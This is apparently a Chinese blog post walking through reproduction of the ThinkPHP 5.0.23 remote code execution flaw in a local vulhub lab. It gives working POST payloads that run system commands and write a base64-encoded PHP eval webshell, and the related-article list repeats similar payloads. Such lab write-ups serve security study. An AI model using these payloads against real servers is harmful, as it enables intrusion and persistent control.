复现ThinkPHP5 5.0.23远程代码执行漏洞

最新推荐文章于 2024-06-23 19:07:57 发布
最新推荐文章于 2024-06-23 19:07:57 发布
阅读量423 收藏
点赞数
文章标签: 安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67813445/article/details/129532690
版权
该文章详细介绍了ThinkPHP5.0.23版本的一个远程代码执行漏洞,通过环境搭建、漏洞描述、复现步骤和利用方法展示了如何利用此漏洞。攻击者可以构造特定请求,调用Request类的任意方法,执行系统命令,甚至写入Webshell进行进一步控制。
摘要由CSDN通过智能技术生成

复现ThinkPHP5 5.0.23远程代码执行漏洞:

一、漏洞描述

二、环境搭建

三、漏洞复现

四、漏洞利用

一、漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

二、环境搭建

cd vulhub-master/thinkphp/5.0.23-rce
docker-compose up -d

访问127.0.0.1:8080

三、漏洞复现

判断是否存在漏洞:

访问/index.php?s=captcha页面,会出现如下报错:

使用 HackBar 插件发送 POST 请求:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

得到回显

whoami 命令成功执行。

四、漏洞利用

通过echo命令写入 Webshell 文件

首先将一句话木马进行 Base64 编码:

发送POST请求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo-n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d >shell.php

访问shell.php页面,发现一句话木马被解析

使用蚁剑进行连接,查看目录

canaan_amber
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 631
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞
EC_Carrot的博客
08-17 340
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现 发送如下数据包即可执行id命令: POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1161
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行
wwxxee
05-20 512
ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现 影响版本: ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1 环境: vulhub-master/thinkphp/5.0.23-rce 启动docker环境之后,访问: http://ip:8080/ POC: POST /index.php?s=captcha HTTP/1.1 Host: 192.168.17.134:8080 User-Age
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
Tender*的博客
08-06 458
2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。关掉代理 进入info.php发现被解析。1、访问靶机地址+端口号 进入首页。
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6194
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题,即远程代码执行漏洞(通常称为RCE)。在ThinkPHP5中,这个漏洞允许攻击者通过精心构造的HTTP请求,执行任意系统命令,...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1847
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 750
vulhub thinkphp5 5.0.23 远程代码执行漏洞
漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞
七天
06-29 1672
ThinkPHP 5.0.23远程代码执行漏洞
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3192
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用
weixin_30617797的博客
07-20 4232
漏洞影响范围: 5.0.0-5.0.23 官方已在5.0.24版本修复该漏洞。测试Payload: /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=inde...
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 458
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值